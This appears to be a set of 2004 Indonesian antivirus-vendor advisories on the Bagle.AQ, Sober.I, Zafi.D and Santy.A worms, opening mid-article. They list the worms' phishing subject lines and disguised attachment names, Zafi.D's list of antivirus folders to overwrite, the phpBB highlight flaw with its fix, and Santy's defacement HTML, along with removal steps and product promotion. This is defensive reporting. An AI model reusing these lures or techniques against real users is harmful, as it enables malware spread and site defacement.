Satu hal yang cukup mengkhawatirkan adalah kecepatan penyebaran virus kini sudah sampai pada tingkat yang sangat tinggi. Menurut pemantauan Vaksincom, sample pertama Bagle,AQ dihentikan oleh MessageLabs pada tanggal 29 Oktober 2004 Pukul 07.00 GMT http://messagelabs.com/news/virusnews/detail/default.asp?contentItemId=1198&region=. Yang mengejutkan adalah virus Bagle.AQ yang pertama idterima oleh Vaksincom pada tanggal 29 Oktober 2004 Pukul 10.00 GMT atau hanya berselang 3 jam dari saat Bagle pertama kali terdeteksi. PT. Vaksincom menyarankan anda untuk selalu mengupdate program antivirus anda secara disiplin setiap hari, instal aplikasi tambahan yang diperlukan seperti anti Adware / anti Spyware karena > 95 % komputer yang terkoneksi ke internet pasti terinfeksi spyware dan jangan lupa update selalu patch dan security pack pada seluruh OS komputer pada jaringan anda. Jika anda mengalami kesulitan dan membutuhkan tenaga profesional untuk menghadapi semua masalah virus anda, PT. Vaksincom di Jakarta dan perwakilannya di Bandung, Jogjakarta, Surabaya, Kediri, Solo, Medan, Palembang, Samarinda, Denpasar dan Makasar siap memberikan layanan profesional untuk melindungi jaringan perusahaan anda dari ancamana virus. Setiap pembelian antivirus Norman Virus control for Corporate dari PT. Vaksincom sudah termasuk Instalasi ke setiap komputer, pembersihan virus dan patching OS, kunjungan rutin setiap bulan dan support on site unlimited tanpa biaya tambahan (GRATIS).

salam,

Alfons Tanujaya (AAT)

PT. Vaksincom

Gedung Rifa lt. IV

Prof. Dr. Satrio blok C4 / 6-7

Jakarta 12950

Telp : 62-21-526 -787 / 752

http://www.vaksin.com

Email : info@...

W32/Sober.I@mm       21 November 2004

Kalau pencuri mengaku semua, penjara penuh

       Kalau pencuri mengaku semuanya, penjara penuh. Ungkapan ini sering kali kita dengar dalam percakapan sehari-hari. Demikian pula dengan virus baru Sober.I yang sedang beredar sejak 19 November 2004 dan menghebohkan dunia, terutama Eropa. Virus ini cukup merepotkan pakar sekuriti Eropa karena memiliki kemampuan mengirimkan dirinya dalam Bahasa Jerman dan Inggris. Hebatnya lagi, hanya negara tertentu saja yang dikirimi email pengantar Bahasa jerman dan sisanya dalam email pengantar Bahasa Inggris. Sampai dengan hari Minggu 21 November 2004 penyebaran Sober.I belum terdeteksi oleh Vaksincom di Indonesia, namun mengingat penyebaran Sober di dunia yang sangat tinggi (lebih tinggi dari Bofra) dan salah satu karakteristik Sober yang hanya dapat berjalan jika dijalankan oleh penerima email dan Indonesia sedang libur panjang sehingga penerima email yang "iseng/ingin tahu/tidak sengaja" mengklik attachment belum masuk kerja, maka diperkirakan dampak maksimal Sober baru akan terlihat pada minggu ke empat November 2004.

Menggunakan dua trik untuk mengelabui korban

Sober.I menggunakan dua hal untuk "meyakinkan" penerimanya bahwa dia bukan virus :

1. Sober.I akan menyertakan pesan bahwa email yang datang telah bebas virus dengan menyertakan footer (penutup) :

*-*-* Mail_Scanner: No Virus
*-*-* <domain-anda>- Anti_Virus Service
*-*-* http://www.<domain-anda>

2. Sober.I akan menampilkan pesan error Winzip palsu pada saat dijalankan :
   
   yang tujuannya adalah supaya korban mengira bahwa file yang dikliknya rusak dan tidak ada perubahan pada sistem komputernya. Padahal tepat pada saat itulah Sober.I langsung menginfeksi komputernya dan menjalankan semua rutin aksinya.

Detail Email Sober.I

Sober.I menggunakan SMTP server sendiri untuk menyebarkan dirinya, seperti yang telah kami utarakan di atas Sober.I memiliki kemampuan untuk mengirimkan dirinya dengan dua alternatif bahasa, yaitu Bahasa Inggris dan Bahasa Jerman. Hebatnya lagi, pemilihan bahasa tidak dilakukan secara acak atau membabi buta tetapi sudah terencana dengan matang. Khusus untuk email korban dengan domain .at, .ch, .de dan .li serta alamat email dengan ekstensi gmx, misalnya gmx.de, gmx.or atau gmx.net akan dikirimi email bervirus dengan bodi email dalam Bahasa Jerman. Hal ini kemungkinan besar dilakukan supaya penerima email tidak curiga dan langsung menjalankan lampiran yang terkandung dalam email. Karena itulah Vaksincom menyarankan agar para pengguna internet yang banyak berhubungan dengan email dari Eropa untuk lebih berhati-hati jika menerima email yang mengandung lampiran, jangan langsung / tidak sengaja dibuka melainkan scan dulu dengan program antivirus terupdate (Norman Virus Control dengan update tanggal 19 november 2004 sudah dapat mengindentifikasi Sober.I dengan baik).

Adapun informasi lebih mendetail mengenai email yang mengandung Sober.I adalah sebagai berikut :

From / Dari : dipalsukan atau daftar nama + domain penerima email :

Daftar nama :

Info
FehlerMail
Webmaster
ReMailer
Lisa
Peter
Michael
Thomas
Elke
Susi
Nadine
Benutzer-Daten
Information
Service
Hilfe
Webmaster
Hostmaster
Postmaster
User-Info

 

Jika domain alamat penerima email bervirus adalah oneng@... maka alamat domain sendernya akan mengambil domain yang sama bajaj-bajuri.com dengan pengirim diambilkan secara acak dari salah satu daftar nama di atas, misalnya webmaster@...

Subject / Subjek : salah satu dari alternatif dibawah ini

FwD:
Re:
Oh God
Registration Confirmation
Confirmation
Your Password
Your mail password
Delivery_failure_notice
Faulty_mail delivery
Mail delivery_failed
Mail Error
illegal signs in your mail
invalid mail
Mail_Delivery_failure
mail delivery system
Key:
SMTP:
ESMTP:
Info von
Mailzustellung fehlgeschlagen
Fehler in E-Mail
Ihre E-Mail wurde verweigert
Mailer Error
Ungueltige Zeichen in Ihrer E-Mail
Mail- Verbindung wurde abgebrochen
Mailer-Fehler
Betr.-Ihr Account
Ihre neuen Account-Daten
Auftragsbestaetigung
Lieferung-Bescheid

Body / Isi email :

Salah satu ciri khas dari Sober.I adalah ia akan menggunakan domain korbannya secara ekstensif, kemungkinan besar untuk meyakinkan penerima email bahwa email yang diterimanya aman. Karena itu anda harus berhati-hati jika menerima email sebagai berikut :

(Vaksincom hanya memberikan contoh email dalam Bahasa Inggris karena pertimbangan kepraktisan dan probabilitas email Sober.I yang datang ke Indonesia dalam Bahasa Jerman sangat kecil).

• I was surprised, too!

• Who_could_suspect_something_like_that? shityiiiii

• Your password was changed successfully!

• Protected message is attached!

• <Kombinasi dari beberapa frasa dibawah ini:>
  _delivery_error
  _does_not_like_
  _failed_after_I_sent_the_message
  _Requested_action_not_taken
  Anti_Virus: No Virus was found
  Attachment: No Virus found
  disabled
  discontinued
  Giving_up_on_
  Mail_Scanner: No Virus
  MAILBOX NOT FOUND
  mailbox_unavailable
  recipient.
  Remote_host_said:
  sender.
  This_account_has_been_
  
  <diikuti dengan> :

   

  *-*-* Mail_Scanner: No Virus
  *-*-* <domain-anda>- Anti_Virus Service
  *-*-* http://www.<domain-anda>

   

  · ++++++ User-Service: http://www.<domain-anda>
  ++++++ MailTo: postmaster <domain-anda>

Attachment / Lampiran : salah satu dari kemungkinan dibawah ini

• <nama domain penerima email>

• auto__mail

• im_shocked

• mail

• oh_nono

• re_mail

• thats_hard

diikuti dengan satu ekstensi dibawah ini :

• .txt

• .doc

• .word

• .xls

• .eml

atau jika berekstensi ganda, maka ekstensi keduanya adalah :

• .zip

• .pif

• .scr

• .bat

• .com

Jika Sober.I datang dalam ekstensi .zip, maka file yang terkandung di dalamnya akan mengandung ekstensi ganda dengan spasi banyak. Seperti yang pernah kami utarakan sebelumnya, tujuan ekstensi dengan spasi banyak ini adalah untuk menyamarkan dirinya agar dikira sebagai file tidak berbahaya (.txt, .doc, .word, .xls dan .eml) padahal sebenarnya jika spasi banyak tersebut diikuti baru ketahuan belangnya bahwa file tersebut berekstensi ganda dan merupakan file eksekutabel yang jika diklik akan langsung mengaktifkan virus Sober.I.

Contoh nama file dengan ekstensi ganda dan spasi banyak adalah :

"message_text.txt                                                                                                                                       .scr"
Jika kita lihat file tersebut seakan-akan file Text dengan nama "message_test.txt", padahal file tesebut adalah file SCR (Screen Saver) dengan nama "message_text.txt<spasi>.scr"
 

Apa yang harus anda lakukan jika sudah terinfeksi Sober.I

Menurut informasi yang kami dapatkan, dalam beberapa kasus, Sober.I dapat berjalan secara tidak sempurna / korup sehingga untuk membersihkannya tidak bisa dengan menggunakan tools, karena itu Vaksincom menyertakan cara pembersihan Sober.I secara manual sebagai berikut :

1. Jika Anda menggunakan Windows ME/XP, nonaktifkan system restore selama masa pembersihan

2. Update antivirus yang anda gunakan, Norman Virus Control dengan teknologi Sandbox dengan update definisi 19 November 2004 akan mendeteksi Sober.I sebagai W32/Sober.I@mm.

3. Jika komputer Anda terhubung ke jaringan, lepaskan terlebih dahulu.

4. Restart komputer di safe mode (pada saat start komputer tekan tombol [F5])

5. Scan dan delete semua file yang terdeteksi sebagai W32/Sober.I@mm.

6. Balikkan registri yang telah dirubah sebagai berikut :

   Klik [Start] pilih Run dan ketik "regedit" dan tekan [Enter] anda akan membuka Registry Editor

    

   Navigasi pada alamat registri :

   • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
     Navigasi pada panel sebelah kanan, temukan dan hapus value file yang terdeteksi oleh Norman sebagai virus Sober pada langkah 5 di atas.

   • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

     Navigasi pada panel sebelah kanan, temukan dan hapus value file yang terdeteksi oleh Norman sebagai virus Sober pada langkah 5 di atas.

   tutup Registry Editor.

7. Restart kembali komputer untuk keluar dari Safe Mode dan aktifkan kembali system restore (Win ME dan XP).

Alfons Tanujaya (AAT)

PT. Vaksincom

Gedung Rifa lt. IV

Prof. Dr. Satrio blok C4 / 6-7

Jakarta 12950

Telp : 62-21-526 -787 / 752

http://www.vaksin.com

Email : info@...

W32/Zafi.D@mm         15 Desember 2004

Virus cerdas yang menguasai 12 Bahasa

     Jika industri IT dipandang sebagai industri yang sangat dinamis dimana perubahan yang terjadi sangat cepat dimana siapa yang bisa mengantisipasi perubahan tersebut yang akan menang dalam persaingan, maka dunia virus yang merupakan bagian dari industri IT lebih dinamis lagi. Sebagai contoh dapat kita lihat dari perkembangan virus Zafi. Pada awal versinya, Zafi.A hanya "bisa" berbahasa Hungaria, kemudian varian berikutnya Zafi.B pada bulan Juni 2004 datang dalam 3 variasi bahasa yaitu Inggris, Rusia dan Hungaria. Sekarang, Zafi.D yang muncul menyaru sebagai kartu ucapan datang dalam variasi 12 bahasa dan hebatnya ia mampu mengirimkan dirinya dalam email sesuai dengan bahasa yang digunakan penerima email dengan trik yang simple dan efektif. Menurut pemantauan Vaksincom sampai dengan pukul 23.13 WITA, 15 Desember 2004 Zafi.D sudah sampai ke Indonesia dan akibatnya cukup merepotkan pengguna komputer khususnya mailserver yang dibombardir oleh berbagai variasi dari Zafi.D yang jumlahnya mencapai ribuan.

Detail Email

Email yang mengandung Zafi.D ini akan menggunakan gambar / icon berwarna kuning dengan font Comic Sans MS berukuran 14 pt berwarna hijau tua (lihat gambar 1).

Gambar 1, Contoh Email Zafi.D

 Adapun alasan dilakukannya hal ini diduga karena :

1. Untuk mengelabui penerima email agar mengira email yang datang merupakan kartu ucapan.

2. Menggunakan icon berukuran kecil untuk menjaga ukuran email tetap kecil supaya mudah di distribusikan.

Zafi.D menggunakan SMTP server sendiri dalam menyebarkan dirinya dan memalsukan alamat email pengirimnya. Adapun kehebatan dari Zafi.D ini seperti kami kemukakan di atas adalah kemampuannya mengirimkan email bervirus dalam belasan bahasa. Adapun cara yang digunakan untuk menyesuaikan bahasa email dengan calon korban adalah dengan mendeteksi domain dari penerima email, jadi jika domainnya .de (Jerman) maka email akan datang dalam Bahasa Jerman, jika domain korban penerima email berakhiran .es, maka email yang dikirim akan berbahasa Spanyol dst. Adapun daftar domain negara yang terdaftar dalam Zafi.D adalah negara-negara di daratan Eropa, antara lain :

.hu Hungaria
.ru  Rusia
.dk  Denmark
.ro  Rumania
.se Swedia
.no Norwegia
.fi  Finlandia
.lt  Lithuania
.pl  Polandia
.pt Portugal
.de  Jerman
.nl Belanda
.cz Republik Czech
.fr Perancis
.it Italia
.mx Meksiko
.at  Austria
.es  Spanyol

Sedangkan untuk domain di luar daftar seperti domain .com atau .id (Indonesia) akan mendapatkan email dalam Bahasa Inggris. Lampiran yang datang beserta email akan berbentuk eksekutable (.cmd, .bat, .pif, ..com) dan file terkompres .zip yang kemungkinan besar akan berhasil masuk ke mailserver umumnya yang memblok semua eksekutable dan meloloskan lampiran terkompres.

Sambil menyelam minum air

Aksi hebat lain yang dilakukan oleh Zafi.D adalah teknik yang digunakan dalam melumpuhkan program antivirus dan firewall sekaligus menyebarkan dirinya dengan sangat efektif. Adapun teknik tersebut adalah sebagai berikut :

Zafi.D akan mencari direktori yang mengandung nama :

syman
viru
trend
secur
panda
cafee
sopho
kasper
firewall

dan mengganti semua file eksekutable pada direktori yang ditemukan dengan file virus. Aksi ini tentunya akan melumpuhkan program antivirus dan membuat komputer korban Zafi.D tidak terproteksi sama sekali. Disamping itu, setiap kali komputer menjalankan program antivirus yang terjadi malahan menjadi menjalankan virus yang telah menggantikan file semua eksekutable pada direktori antivirus / firewall tersebut.

Sulit dibasmi

Zafi.D akan berusaha untuk menghalangi proses pembasmian dirinya dengan memblok akses ke Registry Editor, MS Config dan Task Manager. Seperti kita ketahui, Registry Editor merupakan daftar registri dimana virus mendaftarkan dirinya agar berjalan secara otomatis sewaktu windows dijalankan pertama kali, sedangkan Task Manager biasanya digunakan untuk terminasi aplikasi virus yang sedang berjalan agar dapat dibasmi. Pemblokan atas tiga file ini dapat diatasi dengan melakukan start Windows dalam Safe Mode.

Zafi.D juga berusaha menyebarkan dirinya melalui Peer to Peer dan jaringan dengan cara mengkopikan dirinya pada semua direktori yang mengandung kata :

• Share

• Upload

• Music

Adapun file yang akan dikopikan ke dalam direktori-direktori tersebut akan diberi nama :

• Winamp 5.7 new!.exe

• ICQ2005a new!.exe

Ketika menjalankan aksinya pertama kali menginfeksi komputer, Zafi.D akan menampilkan pesan error palsu (lihat gambar 2)

Gambar 2, Pesan Error Palsu Zafi.D

Setelah berhasil menginfeksi komputer, Zafi.D akan menyaru sebagai file dengan nama "Norton Update.exe" pada direktori system pada windows. Aksi berbahaya lain yang dilakukan oleh Zafi.D adalah membuka port 8181 sehingga memungkinkan virus ini di update atau komputer korban dikuasai oleh penyusup.

Makassar, 16 Desember 2004

Alfons Tanujaya (AAT)

PT. Vaksincom

Gedung Rifa lt. IV

Prof. Dr. Satrio blok C4 / 6-7

Jakarta 12950

Telp : 62-21-526 -787 / 752

http://www.vaksin.com

Email : info@...

Perl/Santy.A       23 Desember 2004

Apakah Google menyelamatkan anda dari "Santy" ?

      "This site is defaced!!!" yang kira-kira berarti "Tamplian website ini berubah"  (tanpa sepengetahuan administrator). Kejutan ini dialami oleh ribuan website yang menjalankan phpBB (Bulletin Board) 2.X yang versinya < 2.0.11. Hal ini terjadi sejak tanggal 21 Desember 2004 namun menurut perkembangan terakhir yang kami dapatkan, penyebaran Santy.A ini sudah dapat dihentikan dengan efektif sejak Google yang sarananya digunakan oleh Santy.A untuk menyebarkan dirinya melakukan bloking sehingga Santy.A tidak dapat meneruskan aksinya walaupun hal ini tidak menjamin penghentian varian berikutnya dari Santy . Sangat menyenangkan melihat keperdulian korporat besar seperti Google atas kepentingan para pengguna internet dunia dimana mereka bersedia melakukan usaha yang signifikan demi kepentingan umum meskipun sebenarnya hal ini bukan tanggungjawabnya dan merupakan tanggungjawab para pengguna phpBB itu sendiri untuk mengupgrade Bulletin Boardnya. Semoga keperdulian atas kepentingan bersama ini dapat diikuti oleh para korporat besar Indonesia juga :), khususnya yang bergerak dibidang IT.

Apa itu phpBB

php adalah bahasa pemrograman OpenSource yang sangat banyak digunakan oleh situs web (server site scripting) untuk memberikan tampilan yang menarik dan proses scripting lain pada situs web. php sendiri pada awalnya merupakan singkatan dari Personal Home Page, namun dalam perkembangannya php digunakan oleh puluhan juta website diseluruh dunia baik perorangan maupun korporat sehingga tidak cocok lagi disebut sebagai Personal Home Page dan banyak yang lebih senang menyebutnya sebagai php saja, beberapa kalangan menguraikan php sebagai singkatan dari Hypertext pre Processor atau Pre Hypertext Processor. phpBB itu sendiri merupakan Buletin Board yang paling banyak digunakan oleh situs web diseluruh dunia. Bulletin Board adalah Forum dalam suatu situs yang digunakan untuk berkomunikasi dua arah bagi para pengakses situs, dapat digunakan sebagai sarana tanya jawab atau menyampaikan informasi dua arah. Salah satu contoh forum adalah http://forum.vaksin.com yang merupakan forum tnaya jawab virus bagi pengakses situs web Vaksin.com.

Higlight Vulnerability

Seperti kita ketahui bersama, software / piranti lunak adalah buatan manusia dan pada dasarnya buatan manusia tidak ada yang sempurna, selalu ditemukan kesalahan pemrograman yang dalam kasus tertentu menyebabkan celah keamanan software tersebut. Celah keamanan dapat memberikan akses kepada pihak yang tidak berhak untuk menjalankan aplikasi / kode pada komputer yang mengandung celah keamanan yang jika dimanfaatkan dengan baik akan berakibat pengambilalihan kendali atas komputer korban.

Dalam kasus phpBB vulnerability ini terjadi kesalahan dalam perintah higlight yang terdapat pada file viewtopic.php yang jika dieksploitasi dengan baik memungkinkan bagi pihak luar untuk menjalankan perintah tertentu, melakukan SQL injection ataupun serangan cross side scripting. Dalam kasus Santy.A ini aksi yang dilakukan adalah merubah tampilan website dengan kalimat : (lihat gambar 1)

Gambar 1, Aksi Santy.A merubah website

Peran positif Google

Bagaimana Santy.A bisa mengetahui situs mana saja yang menggunakan phpBB dalam rimba belantara internet ini ? Jawabannya mudah, Santy.A memanfaatkan Google untuk mencari semua website yang mengandung file viewtopic.php, setelah mendapatkan alamat korbannya maka Santy.A menjalankan aksinya dengan mengirimkan kode tertentu untuk "menaklukkan" website tersebut dan mengganti semua file

.asp, .htm, .jsp, .php, .phtm dan .shtm dengan file html yang telah dipersiapkan terlebih dahulu sehingga tampilannya akan seperti Gambar 1. Untungnya :) aksi yang dilakukan oleh Santy.A hanya deface komputer saja, coba anda bayangkan jika pembuatnya menggunakan semua komputer yang terinfeksi untuk menyerang satu website tertentu seperti varian MyDoom yang menyerang sco.com yang berakibat lumpuhnya website sco.com.

Dari uraian di atas, kita dapat mengetahui bahwa Google tidak memiliki hubungan dengan php dan bukan Google yang bertanggungjawab atas semua website yang terinfeksi Santy.A, namun mereka mau perduli dan pada tanggal 22 Desember (Hari IBU :)) atau 7 jam setelah mendapatkan laporan dari F-Secure mereka melakukan penyaringan atas semua permintaan yang dilakukan oleh Santy.A dan membloknya sehingga secara efektif penyebaran Santy.A berhasil dihentikan, sebagai "bonus" Google juga memberikan listing website mana saja yang berhasil di infeksi oleh Santy.A. Bukannya bangga atau menepuk dada sudah perduli atas kepentingan bersama, Google malahan menyatakan bahwa mereka akan melakukan evaluasi ke dalam guna bereaksi lebih cepat lagi di masa depan jika menemukan kasus serupa dimasa depan :) tepuk tangan untuk Google dan F-Secure.

Tetapi, jika kita kembali melihat akar permasalahan, sebenarnya masalah utama adalah celah keamanan phpBB yang harus ditutupi dan bukan dengan meminta Google memblok query Santy.A, bagaimana nanti kalau muncul Santy.B, Santo.A atau Cecep.C yang tidak menggunakan Google untuk mencari korbannya, atau mereka memiliki kemampuan mencari sendiri calon korbannya ? Jawabannya adalah kembali kepada Administrator website atau hosting provider, kesadaran untuk melakukan patching atas celah keamanan harus ditingkatkan sehingga apapun sarana yang digunakan oleh worm tidak akan berhasil menembus komputer yang telah diamankan dengan disiplin. Karena itu, salah satu hal yang perlu anda pertimbangkan dalam memilih hosting provider adalah ketanggapan administratornya dalam merawat webserver anda.

Detail eksploitasi

phpBB yang rentan atas eksploitasi ini adalah versi :

• phpBB Group phpBB 2.0 .0

• phpBB Group phpBB 2.0.1

• phpBB Group phpBB 2.0.2

• phpBB Group phpBB 2.0.3

• phpBB Group phpBB 2.0.4

• phpBB Group phpBB 2.0.5

• phpBB Group phpBB 2.0.6

• phpBB Group phpBB 2.0.7

• phpBB Group phpBB 2.0.8

• phpBB Group phpBB 2.0.9

• phpBB Group phpBB 2.0.10

dan bagi anda yang menggunakan phpBB versi tersebut di atas (sangat) disarankan untuk mengupgrade ke versi terakhir phpBB 2.0.11 http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240636. Sebenarnya ada cara yang cukup cepat (karena mengupgrade phpBB ke versi 2.0.11 cukup merepotkan dan memakan waktu lama) yaitu mengedit file viewtopic.php (gunakan notepad) yang mengandung kode :

//
// Was a highlight request part of the URI?
//
$highlight_match = $highlight = '';
if (isset($HTTP_GET_VARS['highlight']))
{
   // Split words and phrases
   $words = explode(' ', trim(htmlspecialchars(urldecode($HTTP_GET_VARS['highlight']))));

   for($i = 0; $i < sizeof($words); $i++)
   {

dengan

//
// Was a highlight request part of the URI?
//
$highlight_match = $highlight = '';
if (isset($HTTP_GET_VARS['highlight']))
{
   // Split words and phrases
   $words = explode(' ', trim(htmlspecialchars($HTTP_GET_VARS['highlight'])));

   for($i = 0; $i < sizeof($words); $i++)
   {

Jika anda ingin mengetahui kode tag html yang di jalankan oleh Santy.A adalah sebagai berikut :

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
        <HTML><HEAD><TITLE>This site is defaced!!!</TITLE></HEAD>
        <BODY bgcolor="#000000" text="#FF0000">;
        <H1 >This site is defaced!!!</H1>;
        <HR>;
        <ADDRESS>< b>NeverEverNoSanity WebWorm generation } .
 $generation .q{.< /b
></ADDRESS>
        </BODY>
        </HTML>

Catatan khusus

Celah keamanan highlight vulnerability ini diumumkan pada tanggal 19 November 2004 dan sebulan kemudian virus yang memanfaatkan celah keamanan ini muncul menjalankan aksinya, hal ini menunjukkan waktu munculnya virus dari saat pertama kali celah keamanan diumumkan meningkat, bahkan untuk virus windows seperti Sasser hanya membutuhkan waktu 17 hari dari saat pertamakali celah keamanan LSASS diumumkan. Karena itu anggapan bahwa aplikasi dari vendor tertentu saja yang rentan terhadap serangan virus terlihat mulai dipatahkan karena dalam kenyataanya yang akan diincar oleh virus adalah aplikasi yang paling banyak digunakan karena pembuat virus akan berusaha menimbulkan dampak maksimal dari setiap virus yang diciptakannya.

Untuk Indonesia sendiri, tercatat ada satu website yang menggunakan phpBB yang vulnerable dan berhasil diinfeksi oleh Santy.A (tanggal 21 Desember 2004 pukul 11.33 AM), namun berdasarkan pengamatan kami administrator website tersebut cukup tanggap dan pada saat pembuatan artikel ini website tersebut sudah bebas dari Santy.A. (lihat Gambar 2)

Sumber :

http://www.europe.f-secure.com/weblog/

http://www.securityfocus.com/bid/11672

http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240636

http://www.phpbb.com/phpBB/viewtopic.php?t=240513

http://secunia.com/advisories/13239

http://isc.sans.org/diary.php?date=2004-12-21

http://news.zdnet.co.uk/internet/security/0,39020375,39181656,00.htm

http://juicystudio.com/tutorial/php/

Alfons Tanujaya (AAT)

PT. Vaksincom

Jl. Tanah Abang III /19 E

Ruko Tanaga Mas

Jakarta 10160

Telp : 62-21-3456 850

http://www.vaksin.com

Email : info@...